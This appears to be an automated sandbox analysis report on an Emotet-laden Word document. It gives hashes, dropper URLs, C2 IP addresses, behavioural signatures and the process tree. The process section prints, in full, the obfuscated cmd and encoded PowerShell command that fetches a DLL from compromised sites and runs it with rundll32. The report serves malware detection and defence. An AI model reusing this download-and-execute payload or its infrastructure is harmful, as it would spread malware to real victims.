Analysis

  • max time kernel
    140s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    27-01-2021 04:55

General

  • Target

    Datos_2021_D_81958.doc

  • Size

    165KB

  • MD5

    81cdd55af265255b18a9b2700f475d76

  • SHA1

    c60563e15a43058a594c36c5ec54dd8ef74c6b6b

  • SHA256

    985fae09feedd61a2e56ed1ddbae8de0d34a19c65ab3eb12b057303258aff99c

  • SHA512

    03230f229410699bf36ca57948e722438c891bba187cfeaa96454f7259ec6d9e11d0d8a5597facbb777a04edc4c89659ea11e9b9f6997091077060bee488c431

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://inhaustyle.com/wp-admin/7OtP5/

exe.dropper

https://elsadinc.com/wp-content/B/

exe.dropper

https://jolifm.com/new/5hkc3/

exe.dropper

https://technologydistilled.com/a-nurse-ss8d9/z/

exe.dropper

http://o7therapy.com/egyptian-comedy-hiiro/As0/

exe.dropper

http://signinsolution.com/wp-content/Vr0/

exe.dropper

http://cashstreamfinancial.com/wp-admin/23/

Extracted

Family

emotet

Botnet

Epoch2

C2

69.38.130.14:80

195.159.28.230:8080

162.241.204.233:8080

115.21.224.117:80

78.189.148.42:80

181.165.68.127:80

78.188.225.105:80

161.0.153.60:80

89.106.251.163:80

172.125.40.123:80

5.39.91.110:7080

110.145.11.73:80

190.251.200.206:80

144.217.7.207:7080

75.109.111.18:80

75.177.207.146:80

139.59.60.244:8080

70.183.211.3:80

95.213.236.64:8080

61.19.246.238:443

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Datos_2021_D_81958.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1684
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAFYAIAAgAGUAcgB5AEQANABHACAAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0ARgAgACcAZABpAFIARQBDAHQATwAnACwAJwByACcALAAnAFkAJwAsACcALgAnACwAJwBzAHkAcwBUAEUAbQAuAEkAJwAsACcAbwAnACkAIAApADsAIAAgACAAUwBFAFQAIAAoACIAdwAiACsAIgAzAEMAdAA1ACIAKQAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAIAAnAHMAJwAsACcAcABvAEkAbgB0AG0AQQBuAGEARwBlAHIAJwAsACcARQB0ACcALAAnAFYASQBjAEUAJwAsACcALgBTAEUAcgAnACwAJwB5AHMAVABlAG0ALgBuACcAKQAgACAAKQAgADsAJABLAGoAdQAwAHEAeQB6AD0AJABGADAAXwBNACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABQADAAOQBQADsAJABOADMAMgBYAD0AKAAnAFQAMgAnACsAJwA2AFMAJwApADsAIAAoACAAIABWAEEAcgBJAGEAYgBsAEUAIABFAFIAWQBkADQARwAgAC0AVgBhAGwAdQBlAG8ATgBsAHkAKQA6ADoAIgBjAFIAYABlAGEAdABFAGQAaQBgAFIAYABlAEMAVABPAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AQwA1AGsAXwBvAHkAeAB7ADAAfQBQACcAKwAnAG8AJwArACcAMAAnACsAJwBwADUAOQBwAHsAMAAnACsAJwB9ACcAKQAgACAALQBGAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANQBfAEQAPQAoACcARwAnACsAKAAnADUAJwArACcAOABNACcAKQApADsAIAAoAEMAaABJAEwARABpAFQARQBNACAAKAAnAHYAQQBSAEkAYQBCAEwARQA6AFcAJwArACcAMwAnACsAJwBjACcAKwAnAFQANQAnACkAKQAuAFYAYQBsAFUARQA6ADoAIgBTAGAAZQBgAGMAVQByAEkAYABUAHkAUABSAE8AVABvAGAAYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAEkANgAwAFMAPQAoACcATwAnACsAKAAnADkAJwArACcAMwBVACcAKQApADsAJABLADYAdAA1AG8AXwBwACAAPQAgACgAJwBZACcAKwAoACcANwA1ACcAKwAnAFUAJwApACkAOwAkAEwANgA4AFAAPQAoACcARwA1ACcAKwAnADMAVgAnACkAOwAkAEUAcwAzADgAcQAxADcAPQAkAEgATwBNAEUAKwAoACgAJwB7ACcAKwAnADAAfQBDACcAKwAoACcANQAnACsAJwBrAF8AbwAnACkAKwAnAHkAJwArACcAeAB7ADAAJwArACcAfQBQAG8AMABwADUAOQAnACsAJwBwAHsAMAB9ACcAKQAgAC0ARgAgACAAWwBjAEgAYQByAF0AOQAyACkAKwAkAEsANgB0ADUAbwBfAHAAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQAMAA5AFoAPQAoACgAJwBFADMAJwArACcAMwAnACkAKwAnAEMAJwApADsAJABVAGUANwBhAGQAcQA4AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQASgByAHgAbgBqAG4AMgA9ACgAKAAnAHgAJwArACcAIABbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACsAJwAvAC8AaQBuACcAKwAnAGgAYQB1ACcAKQArACgAJwBzAHQAeQAnACsAJwBsAGUALgAnACkAKwAoACcAYwBvAG0ALwB3AHAALQAnACsAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAJwAvADcAJwArACcATwB0ACcAKwAnAFAAJwArACgAJwA1ACcAKwAnAC8AIQB4ACcAKQArACgAJwAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAJwArACcAYgBzADoALwAvAGUAbABzACcAKQArACgAJwBhACcAKwAnAGQAaQBuACcAKwAnAGMALgAnACsAJwBjAG8AbQAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0AGUAbgB0AC8AJwArACcAQgAvACEAJwArACcAeAAnACkAKwAoACcAIABbACcAKwAnACAAcwBoACAAYgBzACcAKQArACgAJwA6AC8AJwArACcALwBqACcAKQArACgAJwBvAGwAJwArACcAaQBmACcAKQArACgAJwBtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAJwAvAG4AJwArACgAJwBlACcAKwAnAHcALwA1ACcAKQArACcAaABrACcAKwAoACcAYwAzAC8AJwArACcAIQB4ACAAWwAnACsAJwAgAHMAaAAnACkAKwAnACAAYgAnACsAKAAnAHMAOgAvACcAKwAnAC8AJwApACsAKAAnAHQAJwArACcAZQBjAGgAbgBvACcAKwAnAGwAbwAnACkAKwAoACcAZwB5ACcAKwAnAGQAaQBzAHQAaQBsAGwAZQBkAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYQAnACsAJwAtAG4AdQByACcAKwAnAHMAZQAnACsAJwAtAHMAJwApACsAJwBzADgAJwArACgAJwBkACcAKwAnADkALwB6ACcAKwAnAC8AIQAnACkAKwAnAHgAJwArACcAIAAnACsAKAAnAFsAIABzAGgAJwArACcAIABiACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBvACcAKQArACgAJwA3AHQAaABlAHIAYQBwACcAKwAnAHkAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBlACcAKwAnAGcAJwArACcAeQBwAHQAaQBhAG4ALQBjAG8AbQAnACsAJwBlAGQAeQAtAGgAaQAnACsAJwBpACcAKQArACgAJwByACcAKwAnAG8ALwBBACcAKQArACgAJwBzADAALwAhACcAKwAnAHgAIABbACAAJwArACcAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAHMAaQBnAG4AJwArACcAaQAnACkAKwAnAG4AJwArACgAJwBzAG8AJwArACcAbAB1AHQAJwApACsAJwBpAG8AJwArACgAJwBuAC4AYwBvAG0ALwAnACsAJwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC8AVgByADAALwAnACkAKwAoACcAIQB4ACcAKwAnACAAWwAgACcAKQArACgAJwBzACcAKwAnAGgAIAAnACkAKwAoACcAYgAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAYwBhAHMAJwApACsAKAAnAGgAJwArACcAcwB0ACcAKQArACcAcgBlACcAKwAnAGEAbQAnACsAJwBmACcAKwAoACcAaQBuACcAKwAnAGEAJwArACcAbgBjAGkAYQBsACcAKwAnAC4AYwBvACcAKwAnAG0ALwB3AHAAJwApACsAKAAnAC0AYQBkACcAKwAnAG0AaQBuAC8AMgAnACsAJwAzAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAoACcAeAAgAFsAJwArACcAIABzAGgAIAAnACkAKwAnAGIAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABVAGUANwBhAGQAcQA4ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAYABQAEwASQBUACIAKAAkAEEANAA2AEQAIAArACAAJABLAGoAdQAwAHEAeQB6ACAAKwAgACQAQQBfADgARgApADsAJABFADEAMwBZAD0AKAAoACcAVAA4ACcAKwAnADEAJwApACsAJwBIACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVgB3AGsAMQB3AGYAdwAgAGkAbgAgACQASgByAHgAbgBqAG4AMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAcwB5AFMAVABFAG0ALgBOAEUAdAAuAFcAZQBCAEMAbABpAGUAbgBUACkALgAiAEQAbwB3AG4AYABsAG8AYABBAGQARgBgAEkAbABlACIAKAAkAFYAdwBrADEAdwBmAHcALAAgACQARQBzADMAOABxADEANwApADsAJABaADMAMQBQAD0AKAAoACcAUQBfACcAKwAnADMAJwApACsAJwBTACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABFAHMAMwA4AHEAMQA3ACkALgAiAEwAYABlAGAATgBnAHQASAAiACAALQBnAGUAIAAzADYAMwAwADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZAAnACsAJwBsAGwAMwAyACcAKQAgACQARQBzADMAOABxADEANwAsACgAKAAnAEEAJwArACcAbgB5AFMAJwApACsAKAAnAHQAcgBpAG4AJwArACcAZwAnACkAKQAuACIAVABgAG8AUwBUAHIAaQBOAEcAIgAoACkAOwAkAEkANAA2AEQAPQAoACcAWgAnACsAKAAnADYANQAnACsAJwBGACcAKQApADsAYgByAGUAYQBrADsAJABTADEAMwBaAD0AKAAnAFIAJwArACgAJwAwACcAKwAnAF8ASAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABfADAASQA9ACgAJwBJADAAJwArACcAMgBPACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1188
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABzAFYAIAAgAGUAcgB5AEQANABHACAAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0ARgAgACcAZABpAFIARQBDAHQATwAnACwAJwByACcALAAnAFkAJwAsACcALgAnACwAJwBzAHkAcwBUAEUAbQAuAEkAJwAsACcAbwAnACkAIAApADsAIAAgACAAUwBFAFQAIAAoACIAdwAiACsAIgAzAEMAdAA1ACIAKQAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAIAAnAHMAJwAsACcAcABvAEkAbgB0AG0AQQBuAGEARwBlAHIAJwAsACcARQB0ACcALAAnAFYASQBjAEUAJwAsACcALgBTAEUAcgAnACwAJwB5AHMAVABlAG0ALgBuACcAKQAgACAAKQAgADsAJABLAGoAdQAwAHEAeQB6AD0AJABGADAAXwBNACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABQADAAOQBQADsAJABOADMAMgBYAD0AKAAnAFQAMgAnACsAJwA2AFMAJwApADsAIAAoACAAIABWAEEAcgBJAGEAYgBsAEUAIABFAFIAWQBkADQARwAgAC0AVgBhAGwAdQBlAG8ATgBsAHkAKQA6ADoAIgBjAFIAYABlAGEAdABFAGQAaQBgAFIAYABlAEMAVABPAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AQwA1AGsAXwBvAHkAeAB7ADAAfQBQACcAKwAnAG8AJwArACcAMAAnACsAJwBwADUAOQBwAHsAMAAnACsAJwB9ACcAKQAgACAALQBGAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANQBfAEQAPQAoACcARwAnACsAKAAnADUAJwArACcAOABNACcAKQApADsAIAAoAEMAaABJAEwARABpAFQARQBNACAAKAAnAHYAQQBSAEkAYQBCAEwARQA6AFcAJwArACcAMwAnACsAJwBjACcAKwAnAFQANQAnACkAKQAuAFYAYQBsAFUARQA6ADoAIgBTAGAAZQBgAGMAVQByAEkAYABUAHkAUABSAE8AVABvAGAAYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAEkANgAwAFMAPQAoACcATwAnACsAKAAnADkAJwArACcAMwBVACcAKQApADsAJABLADYAdAA1AG8AXwBwACAAPQAgACgAJwBZACcAKwAoACcANwA1ACcAKwAnAFUAJwApACkAOwAkAEwANgA4AFAAPQAoACcARwA1ACcAKwAnADMAVgAnACkAOwAkAEUAcwAzADgAcQAxADcAPQAkAEgATwBNAEUAKwAoACgAJwB7ACcAKwAnADAAfQBDACcAKwAoACcANQAnACsAJwBrAF8AbwAnACkAKwAnAHkAJwArACcAeAB7ADAAJwArACcAfQBQAG8AMABwADUAOQAnACsAJwBwAHsAMAB9ACcAKQAgAC0ARgAgACAAWwBjAEgAYQByAF0AOQAyACkAKwAkAEsANgB0ADUAbwBfAHAAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQAMAA5AFoAPQAoACgAJwBFADMAJwArACcAMwAnACkAKwAnAEMAJwApADsAJABVAGUANwBhAGQAcQA4AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQASgByAHgAbgBqAG4AMgA9ACgAKAAnAHgAJwArACcAIABbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACsAJwAvAC8AaQBuACcAKwAnAGgAYQB1ACcAKQArACgAJwBzAHQAeQAnACsAJwBsAGUALgAnACkAKwAoACcAYwBvAG0ALwB3AHAALQAnACsAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAJwAvADcAJwArACcATwB0ACcAKwAnAFAAJwArACgAJwA1ACcAKwAnAC8AIQB4ACcAKQArACgAJwAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAJwArACcAYgBzADoALwAvAGUAbABzACcAKQArACgAJwBhACcAKwAnAGQAaQBuACcAKwAnAGMALgAnACsAJwBjAG8AbQAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0AGUAbgB0AC8AJwArACcAQgAvACEAJwArACcAeAAnACkAKwAoACcAIABbACcAKwAnACAAcwBoACAAYgBzACcAKQArACgAJwA6AC8AJwArACcALwBqACcAKQArACgAJwBvAGwAJwArACcAaQBmACcAKQArACgAJwBtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAJwAvAG4AJwArACgAJwBlACcAKwAnAHcALwA1ACcAKQArACcAaABrACcAKwAoACcAYwAzAC8AJwArACcAIQB4ACAAWwAnACsAJwAgAHMAaAAnACkAKwAnACAAYgAnACsAKAAnAHMAOgAvACcAKwAnAC8AJwApACsAKAAnAHQAJwArACcAZQBjAGgAbgBvACcAKwAnAGwAbwAnACkAKwAoACcAZwB5ACcAKwAnAGQAaQBzAHQAaQBsAGwAZQBkAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYQAnACsAJwAtAG4AdQByACcAKwAnAHMAZQAnACsAJwAtAHMAJwApACsAJwBzADgAJwArACgAJwBkACcAKwAnADkALwB6ACcAKwAnAC8AIQAnACkAKwAnAHgAJwArACcAIAAnACsAKAAnAFsAIABzAGgAJwArACcAIABiACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBvACcAKQArACgAJwA3AHQAaABlAHIAYQBwACcAKwAnAHkAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBlACcAKwAnAGcAJwArACcAeQBwAHQAaQBhAG4ALQBjAG8AbQAnACsAJwBlAGQAeQAtAGgAaQAnACsAJwBpACcAKQArACgAJwByACcAKwAnAG8ALwBBACcAKQArACgAJwBzADAALwAhACcAKwAnAHgAIABbACAAJwArACcAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAHMAaQBnAG4AJwArACcAaQAnACkAKwAnAG4AJwArACgAJwBzAG8AJwArACcAbAB1AHQAJwApACsAJwBpAG8AJwArACgAJwBuAC4AYwBvAG0ALwAnACsAJwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC8AVgByADAALwAnACkAKwAoACcAIQB4ACcAKwAnACAAWwAgACcAKQArACgAJwBzACcAKwAnAGgAIAAnACkAKwAoACcAYgAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAYwBhAHMAJwApACsAKAAnAGgAJwArACcAcwB0ACcAKQArACcAcgBlACcAKwAnAGEAbQAnACsAJwBmACcAKwAoACcAaQBuACcAKwAnAGEAJwArACcAbgBjAGkAYQBsACcAKwAnAC4AYwBvACcAKwAnAG0ALwB3AHAAJwApACsAKAAnAC0AYQBkACcAKwAnAG0AaQBuAC8AMgAnACsAJwAzAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAoACcAeAAgAFsAJwArACcAIABzAGgAIAAnACkAKwAnAGIAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABVAGUANwBhAGQAcQA4ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAYABQAEwASQBUACIAKAAkAEEANAA2AEQAIAArACAAJABLAGoAdQAwAHEAeQB6ACAAKwAgACQAQQBfADgARgApADsAJABFADEAMwBZAD0AKAAoACcAVAA4ACcAKwAnADEAJwApACsAJwBIACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVgB3AGsAMQB3AGYAdwAgAGkAbgAgACQASgByAHgAbgBqAG4AMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAcwB5AFMAVABFAG0ALgBOAEUAdAAuAFcAZQBCAEMAbABpAGUAbgBUACkALgAiAEQAbwB3AG4AYABsAG8AYABBAGQARgBgAEkAbABlACIAKAAkAFYAdwBrADEAdwBmAHcALAAgACQARQBzADMAOABxADEANwApADsAJABaADMAMQBQAD0AKAAoACcAUQBfACcAKwAnADMAJwApACsAJwBTACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABFAHMAMwA4AHEAMQA3ACkALgAiAEwAYABlAGAATgBnAHQASAAiACAALQBnAGUAIAAzADYAMwAwADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZAAnACsAJwBsAGwAMwAyACcAKQAgACQARQBzADMAOABxADEANwAsACgAKAAnAEEAJwArACcAbgB5AFMAJwApACsAKAAnAHQAcgBpAG4AJwArACcAZwAnACkAKQAuACIAVABgAG8AUwBUAHIAaQBOAEcAIgAoACkAOwAkAEkANAA2AEQAPQAoACcAWgAnACsAKAAnADYANQAnACsAJwBGACcAKQApADsAYgByAGUAYQBrADsAJABTADEAMwBaAD0AKAAnAFIAJwArACgAJwAwACcAKwAnAF8ASAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABfADAASQA9ACgAJwBJADAAJwArACcAMgBPACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1216
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\C5k_oyx\Po0p59p\Y75U.dll AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1344
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\C5k_oyx\Po0p59p\Y75U.dll AnyString
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\C5k_oyx\Po0p59p\Y75U.dll",#1
              5⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1008
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pwqzcolihrcwg\bjpspauyrpno.ftb",aZjPSWBtcpikBnj
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1912
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pwqzcolihrcwg\bjpspauyrpno.ftb",#1
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1980

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • \Users\Admin\C5k_oyx\Po0p59p\Y75U.dll
      MD5

      a156006decada82b630c06855f4f6f55

      SHA1

      5e678d0fd3785ef5a3950b15b6379c0e76b4f4df

      SHA256

      57b1169ceba5da73b7dbd109a550c2ba456876b47d3a379163dc1257ef08cf8e

      SHA512

      29febc83eed0f723e98a9b62588419ac4af1c06620a9c16981a9ee08c8b0004eea62556abbf635d899394b0cff157a913304e639be37f7dff640ebcbe6fe352a

    • memory/436-5-0x0000000000000000-mapping.dmp
    • memory/1008-25-0x0000000000000000-mapping.dmp
    • memory/1216-14-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
      Filesize

      4KB

    • memory/1216-6-0x0000000000000000-mapping.dmp
    • memory/1216-15-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
      Filesize

      4KB

    • memory/1216-16-0x000000001B820000-0x000000001B821000-memory.dmp
      Filesize

      4KB

    • memory/1216-11-0x00000000023D0000-0x00000000023D1000-memory.dmp
      Filesize

      4KB

    • memory/1216-10-0x000000001ADF0000-0x000000001ADF1000-memory.dmp
      Filesize

      4KB

    • memory/1216-13-0x000000001AD74000-0x000000001AD76000-memory.dmp
      Filesize

      8KB

    • memory/1216-12-0x000000001AD70000-0x000000001AD72000-memory.dmp
      Filesize

      8KB

    • memory/1216-9-0x0000000002040000-0x0000000002041000-memory.dmp
      Filesize

      4KB

    • memory/1216-8-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp
      Filesize

      9.9MB

    • memory/1216-7-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp
      Filesize

      8KB

    • memory/1344-17-0x0000000000000000-mapping.dmp
    • memory/1684-2-0x0000000072DC1000-0x0000000072DC4000-memory.dmp
      Filesize

      12KB

    • memory/1684-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1684-3-0x0000000070841000-0x0000000070843000-memory.dmp
      Filesize

      8KB

    • memory/1708-43-0x000007FEF68D0000-0x000007FEF6B4A000-memory.dmp
      Filesize

      2.5MB

    • memory/1912-35-0x0000000000000000-mapping.dmp
    • memory/1976-20-0x00000000756A1000-0x00000000756A3000-memory.dmp
      Filesize

      8KB

    • memory/1976-19-0x0000000000000000-mapping.dmp
    • memory/1976-31-0x00000000001E0000-0x0000000000200000-memory.dmp
      Filesize

      128KB

    • memory/1976-32-0x0000000010000000-0x0000000010023000-memory.dmp
      Filesize

      140KB

    • memory/1980-37-0x0000000000000000-mapping.dmp